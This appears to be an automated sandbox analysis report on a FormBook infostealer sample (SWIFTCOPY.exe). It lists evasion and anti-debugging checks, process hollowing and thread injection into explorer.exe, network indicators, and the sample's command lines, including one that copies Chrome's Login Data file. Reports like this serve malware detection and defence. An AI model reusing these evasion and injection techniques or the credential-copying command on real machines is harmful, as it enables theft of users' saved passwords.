Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: SWIFTCOPY.exeBinary or memory string: SBIEDLL.DLL
Source: SWIFTCOPY.exe.4.drBinary or memory string: LOADLIBRARYWNTPROTECTVIRTUALMEMORYNTQUERYINFORMATIONPROCESSNTALLOCATEVIRTUALMEMORYGETPROCADDRESSKERNEL32.DLLSBIEDLL.DLLDBGHELP.DLLNTDLL.DLLNTDLLNTSETINFORMATIONTHREADNTWRITEVIRTUALMEMORYRTLADJUSTPRIVILEGENTSETINFORMATIONPROCESSRTLDECOMPRESSBUFFERNTQUERYINFORMATIONPROCESSKERNEL32EXITPROCESSVIRTUALPROTECTVIRTUALALLOCSLEEPCREATEFILEWWRITEFILECLOSEHANDLEGETMODULEHANDLEWGETENVIRONMENTVARIABLEWGETTICKCOUNTADVAPI32REGOPENKEYEXWREGQUERYVALUEEXWREGCLOSEKEYCRYPTACQUIRECONTEXTWCRYPTCREATEHASHCRYPTHASHDATACRYPTDERIVEKEYCRYPTDECRYPTCRYPTENCRYPTCRYPTDESTROYKEYCRYPTDESTROYHASHCRYPTRELEASECONTEXTUSER32CALLWINDOWPROCWOLE32COTASKMEMALLOCSHELL32SHELLEXECUTEWOLEAUT32SYSALLOCSTRINGBYTELENU
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeRDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeRDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000437244 second address: 000000000043724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000004374AE second address: 00000000004374B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeRDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeRDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000008C7244 second address: 00000000008C724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000008C74AE second address: 00000000008C74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 4600Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 4860Thread sleep time: -74000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4620Thread sleep time: -75000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\explorer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: SWIFTCOPY.exeBinary or memory string: *QEMU*
Source: cmstp.exeBinary or memory string: "Hyper-V RAW"
Source: SWIFTCOPY.exeBinary or memory string: *VMWARE*
Source: SWIFTCOPY.exe.4.drBinary or memory string: *QEMU*NSYSTEM\ControlSet001\Services\Disk\Enum
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
Enables debug privilegesShow sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeProcess token adjusted: DebugJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\explorer.exeFile created: zx4pbev1pyv_h.exe.10.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\explorer.exeNetwork Connect: 103.197.25.46 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 154.85.184.57 80Jump to behavior
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeSection loaded: unknown target: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeThread register set: target process: 2864Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 2864Jump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeThread register set: target process: 2864Jump to behavior
Queues an APC in another process (thread injection)Show sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
Sample uses process hollowing techniqueShow sources
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 12A0000Jump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: C00000Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exeJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeProcess created: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exeJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: explorer.exeBinary or memory string: Shell_TrayWnd
Source: explorer.exeBinary or memory string: Progman
Source: explorer.exeBinary or memory string: "Program Manager"

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeQueries volume information: C:\ VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles\0i8ia8vs.default\logins.jsonJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles\0i8ia8vs.default\key4.dbJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles\0i8ia8vs.default\cert9.dbJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles\0i8ia8vs.default\pkcs11.txtJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\SysWOW64\cmstp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 225598 URL: https://onedrive.live.com/d... Startdate: 27/04/2020 Architecture: WINDOWS Score: 100 98 Multi AV Scanner detection for dropped file 2->98 100 Sigma detected: Steal Google chrome login data 2->100 102 Machine Learning detection for dropped file 2->102 104 2 other signatures 2->104 13 iexplore.exe 7 57 2->13         started        process3 process4 15 unarchiver.exe 5 13->15         started        17 iexplore.exe 26 13->17         started        dnsIp5 20 cmd.exe 1 15->20         started        22 7za.exe 2 15->22         started        72 onedrive.live.com 17->72 74 gemihq.dm.files.1drv.com 17->74 process6 file7 25 SWIFTCOPY.exe 13 20->25         started        28 conhost.exe 20->28         started        64 C:\Users\user\AppData\Local\...\SWIFTCOPY.exe, PE32 22->64 dropped 30 conhost.exe 22->30         started        process8 signatures9 110 Multi AV Scanner detection for dropped file 25->110 112 Machine Learning detection for dropped file 25->112 114 Maps a DLL or memory area into another process 25->114 116 Tries to detect virtualization through RDTSC time measurements 25->116 32 SWIFTCOPY.exe 25->32         started        process10 signatures11 82 Modifies the context of a thread in another process (thread injection) 32->82 84 Maps a DLL or memory area into another process 32->84 86 Sample uses process hollowing technique 32->86 88 Queues an APC in another process (thread injection) 32->88 35 explorer.exe 6 32->35 injected process12 dnsIp13 76 www.dangchelan.com 103.197.25.46, 49951, 80 unknown Hong Kong 35->76 78 www.dealspiper.com 154.85.184.57, 49952, 49953, 49954 unknown Seychelles 35->78 80 2 other IPs or domains 35->80 62 C:\Users\user\AppData\...\zx4pbev1pyv_h.exe, PE32 35->62 dropped 106 System process connects to network (likely due to code injection or exploit) 35->106 108 Benign windows process drops PE files 35->108 40 cmstp.exe 1 19 35->40         started        44 zx4pbev1pyv_h.exe 4 35->44         started        46 cmmon32.exe 35->46         started        file14 signatures15 process16 file17 66 C:\Users\user\AppData\...\23Ologrv.ini, data 40->66 dropped 68 C:\Users\user\AppData\...\23Ologri.ini, data 40->68 dropped 70 C:\Users\user\AppData\...\23Ologrf.ini, data 40->70 dropped 118 Detected FormBook malware 40->118 120 Tries to steal Mail credentials (via file access) 40->120 122 Tries to harvest and steal browser information (history, passwords, etc) 40->122 124 Modifies the context of a thread in another process (thread injection) 40->124 48 cmd.exe 2 40->48         started        52 cmd.exe 1 40->52         started        126 Maps a DLL or memory area into another process 44->126 54 zx4pbev1pyv_h.exe 44->54         started        128 Tries to detect virtualization through RDTSC time measurements 46->128 signatures18 process19 file20 60 C:\Users\user\AppData\Local\Temp\DB1, SQLite 48->60 dropped 90 Tries to harvest and steal browser information (history, passwords, etc) 48->90 56 conhost.exe